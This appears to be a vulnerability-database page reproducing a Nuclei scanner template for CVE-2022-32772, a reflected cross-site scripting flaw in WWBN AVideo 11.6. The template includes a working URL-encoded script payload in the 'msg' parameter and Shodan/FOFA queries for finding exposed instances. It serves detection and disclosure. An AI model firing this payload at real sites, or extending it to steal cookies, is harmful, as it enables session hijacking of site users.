Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-32772
HistoryAug 28, 2022 - 7:51 a.m.

WWBN AVideo 11.6 - Cross-Site Scripting

2022-08-2807:51:09
ProjectDiscovery
github.com
3
cve-2022-32772
cross-site scripting
wwbn
avideo

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6.2

Confidence

High

EPSS

0.001

Percentile

32.1%

WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization.
id: CVE-2022-32772

info:
  name: WWBN AVideo 11.6 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
    - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32772
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-32772
    cwe-id: CWE-79
    epss-score: 0.00074
    epss-percentile: 0.31793
    cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wwbn
    product: avideo
    shodan-query:
      - http.html:"AVideo"
      - http.html:"avideo"
    fofa-query: body="avideo"
  tags: cve2022,cve,avideo,xss,wwbn

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'avideoAlertInfo("</script><script>alert(document.cookie);</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f44538a5f1611046dae02850674454d6c72fb52c43cdf072069ef817b35619a30220042e1203f3fe3013a6e15ecb2ca01a2f5a40471db2231fa400623f262d09189e:922c64590222798bb761d5b6d8e72950

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6.2

Confidence

High

EPSS

0.001

Percentile

32.1%

Related for NUCLEI:CVE-2022-32772